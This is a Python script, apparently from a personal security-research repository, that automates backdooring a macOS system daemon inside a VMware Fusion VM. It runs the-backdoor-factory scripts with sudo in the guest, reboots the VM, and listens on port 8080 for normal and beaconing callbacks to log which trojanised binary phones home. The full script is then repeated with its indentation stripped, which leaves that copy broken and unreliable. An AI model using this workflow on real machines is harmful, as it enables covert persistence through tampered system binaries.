secretsquirrel/automate_vmfusion_binary_patching.py

## automate_vmfusion_binary_patching.py
#!/user/bin/python
import os
import socket
import logging
import time

#edit the paths below with your username.  this script was not build for public useage.
#given a list of paths
#path each of these then launch a port to listen for a connection

listofbins = ['/System/Library/PrivateFrameworks/CacheDelete.framework/deleted',
              ]

logging.basicConfig(filename='patching.log',
                    level='INFO',
                    format='%(asctime)s %(message)s'
                    )

revert_cmd = 'vmrun -T fusion revertToSnapshot /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx "for testing core daemons"'

start_cmd = 'vmrun -T fusion start /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx'

restart_cmd = 'vmrun -T fusion reset /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx'


def socket_test(atimeout):
    print "Listening for", atimeout, "seconds"

    successful_connection = False
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.settimeout(atimeout)
    try:
        s.bind(('0.0.0.0', 8080))
        s.listen(1)
        conn, addr = s.accept()
        logging.debug('Connected by %s' % str(addr))
        print 'Connected by', addr
        successful_connection = True
    except Exception as e:
        print str(e)

    try:
        logging.debug('Attempting to close socket')
        print 'Attempting to close socket'
        conn.close()
        s.shutdown()
        s.close()
        time.sleep(5)
    except:
        pass

    return successful_connection


with open('patching_log', 'w') as f:
    for binary in listofbins:
        os.system(revert_cmd)
        os.system(start_cmd)

        successful_connection = False
        normal_patching_script = '''vmrun -T fusion -gu test -gp password runScriptInGuest "/Users/YOURUSERNAME/Documents/Virtual Machines.localized/OS X 10.10.vmwarevm/OS X 10.10.vmx" -activeWindow -interactive "/bin/bash" "sudo bash -c '/Users/test/the-backdoor-factory/automate_testing.py '"''' + str(binary)

        beaconing_patching_script = '''vmrun -T fusion -gu test -gp password runScriptInGuest "/Users/YOURUSERNAME/Documents/Virtual Machines.localized/OS X 10.10.vmwarevm/OS X 10.10.vmx" -activeWindow -interactive "/bin/bash" "sudo bash -c '/Users/test/the-backdoor-factory/beaconing_automate_testing.py '"''' + str(binary)
        logging.debug('Attmepting normal patching of %s' % binary)
        print "Normal patching", binary
        time.sleep(5)
        os.system(normal_patching_script)
        os.system(restart_cmd)
        successful_connection = socket_test(60)

        if successful_connection is True:
            logging.info('Successful patching with normal payload of %s' % binary)
            writeThis = 'Successful patching with normal payload of %s\n' % binary
            f.write(writeThis)
            continue
        else:
            logging.info('No patching with regular payload for %s' % binary)
            writeThis = 'No patching with regular payload for %s\n' % binary
            f.write(writeThis)

	time.sleep(5)
        logging.debug("Beaconing patching of %s" % binary)
        print "Beaconing patching", binary
        os.system(revert_cmd)
        os.system(start_cmd)

        os.system(beaconing_patching_script)
        os.system(restart_cmd)

        successful_connection = socket_test(60)

        if successful_connection is True:
            logging.info("Successful patching with beaconing payload of %s" % binary)
            writeThis = 'Successful patching with beaconing payload of %s\n' % binary
            f.write(writeThis)
            continue
        else:
            logging.info("No patching with beaconing payload for %s" % binary)
            writeThis = 'No patching with beaconing payload for %s\n' % binary
            f.write(writeThis)
	#!/user/bin/python
	import os
	import socket
	import logging
	import time

	#edit the paths below with your username. this script was not build for public useage.
	#given a list of paths
	#path each of these then launch a port to listen for a connection

	listofbins = ['/System/Library/PrivateFrameworks/CacheDelete.framework/deleted',
	]

	logging.basicConfig(filename='patching.log',
	level='INFO',
	format='%(asctime)s %(message)s'
	)

	revert_cmd = 'vmrun -T fusion revertToSnapshot /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx "for testing core daemons"'

	start_cmd = 'vmrun -T fusion start /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx'

	restart_cmd = 'vmrun -T fusion reset /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx'


	def socket_test(atimeout):
	print "Listening for", atimeout, "seconds"

	successful_connection = False
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	s.settimeout(atimeout)
	try:
	s.bind(('0.0.0.0', 8080))
	s.listen(1)
	conn, addr = s.accept()
	logging.debug('Connected by %s' % str(addr))
	print 'Connected by', addr
	successful_connection = True
	except Exception as e:
	print str(e)

	try:
	logging.debug('Attempting to close socket')
	print 'Attempting to close socket'
	conn.close()
	s.shutdown()
	s.close()
	time.sleep(5)
	except:
	pass

	return successful_connection


	with open('patching_log', 'w') as f:
	for binary in listofbins:
	os.system(revert_cmd)
	os.system(start_cmd)

	successful_connection = False
	normal_patching_script = '''vmrun -T fusion -gu test -gp password runScriptInGuest "/Users/YOURUSERNAME/Documents/Virtual Machines.localized/OS X 10.10.vmwarevm/OS X 10.10.vmx" -activeWindow -interactive "/bin/bash" "sudo bash -c '/Users/test/the-backdoor-factory/automate_testing.py '"''' + str(binary)

	beaconing_patching_script = '''vmrun -T fusion -gu test -gp password runScriptInGuest "/Users/YOURUSERNAME/Documents/Virtual Machines.localized/OS X 10.10.vmwarevm/OS X 10.10.vmx" -activeWindow -interactive "/bin/bash" "sudo bash -c '/Users/test/the-backdoor-factory/beaconing_automate_testing.py '"''' + str(binary)
	logging.debug('Attmepting normal patching of %s' % binary)
	print "Normal patching", binary
	time.sleep(5)
	os.system(normal_patching_script)
	os.system(restart_cmd)
	successful_connection = socket_test(60)

	if successful_connection is True:
	logging.info('Successful patching with normal payload of %s' % binary)
	writeThis = 'Successful patching with normal payload of %s\n' % binary
	f.write(writeThis)
	continue
	else:
	logging.info('No patching with regular payload for %s' % binary)
	writeThis = 'No patching with regular payload for %s\n' % binary
	f.write(writeThis)

	time.sleep(5)
	logging.debug("Beaconing patching of %s" % binary)
	print "Beaconing patching", binary
	os.system(revert_cmd)
	os.system(start_cmd)

	os.system(beaconing_patching_script)
	os.system(restart_cmd)

	successful_connection = socket_test(60)

	if successful_connection is True:
	logging.info("Successful patching with beaconing payload of %s" % binary)
	writeThis = 'Successful patching with beaconing payload of %s\n' % binary
	f.write(writeThis)
	continue
	else:
	logging.info("No patching with beaconing payload for %s" % binary)
	writeThis = 'No patching with beaconing payload for %s\n' % binary
	f.write(writeThis)